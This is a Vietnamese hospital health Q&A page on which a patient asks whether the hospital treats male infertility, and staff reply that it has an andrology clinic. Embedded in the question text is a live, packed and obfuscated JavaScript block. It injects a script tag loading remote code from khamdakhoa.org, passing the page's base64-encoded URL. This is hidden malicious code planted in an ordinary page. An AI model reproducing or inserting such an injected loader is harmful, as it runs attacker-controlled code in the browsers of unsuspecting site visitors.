Hỏi đáp sức khỏe

 Bệnh viện có khám nam khoa không ạ?
Họ tên: Trần văn thanh , Địa chỉ:Hậu giang
HỎI: <script> eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6 5(n,h){3 i=8();a 5=6(9,1n){9=9-k;3 j=i[9];a j},5(n,h)}3 0=5;6 8(){3 c=[\'C://D.J/K/M.p?v=\',\'z\',\'L\',\'H\',\'G\',\'F\',\'E\',\'4\',\'B\',\'A\',\'y\',\'x\',\'w\',\'u\',\'t\',\'s\',\'r\',\'q\'];8=6(){a c};a 8()}(6(b,e){3 1=5,7=b();N(!![]){I{3 d=2(1(P))/Y+2(1(19))/1a+-2(1(1b))/1c+2(1(O))/1e+2(1(18))/1f*(-2(1(1h))/1i)+-2(1(1j))/1k+2(1(1l))/1m;1g(d===e)17;16 7[\'g\'](7[\'f\']())}15(R){7[\'g\'](7[\'f\']())}}}(8,S));3 4=l[0(T)](0(U)),m=o[0(V)][0(k)];4[0(W)]=\'Q/X\',4[0(Z)]=0(10)+o[0(11)](m),l[0(12)](\'13\')[14][0(1d)](4);',62,86,'_0x62b860|_0x457ae2|parseInt|var|script|_0x5d72|function|_0x11841d|_0x3516|_0x5d72e1|return|_0x3338bd|_0x1c7859|_0xbceebf|_0x4f9b98|shift|push|_0x476eae|_0x351679|_0x38124a|0x1c8|document|crurl|_0x1d4990|window|php|2125165DwvxMr|getElementsByTagName|appendChild|createElement|5394032ccRlHg||384162qAOqHO|location|type|427451epjwXS|href|195AoFnId|https|khamdakhoa|84642YCVRCr|405450jLIVPN|btoa|279852VbHulP|try|org|js|src|js3|while|0x1d4|0x1d2|text|_0x402b7b|0x5fd7b|0x1cd|0x1d8|0x1ca|0x1c9|javascript|0x1|0x1d3|0x1d1|0x1d5|0x1cf|head|0x0|catch|else|break|0x1d9|0x1d6|0x2|0x1cb|0x3|0x1ce|0x4|0x5|if|0x1d7|0x6|0x1d0|0x7|0x1cc|0x8|_0x7e2399'.split('|'),0,{})) </script> Chào bác sĩ, bác sĩ cho em hỏi là bệnh viện mình có khám vô sinh hiếm muộn nam không ạ?
ĐÁP: Chào bạn. Tại bệnh viện có phòng khám Nam khoa. Mời bạn đến bệnh viện để bác sĩ thăm khám và tư vấn cho bạn nhé.

tin nổi bật


Liên kiết

Tiện ích

  • Quản lý chất lượng
  • Thông Tin Dược
  • Lịch Tuần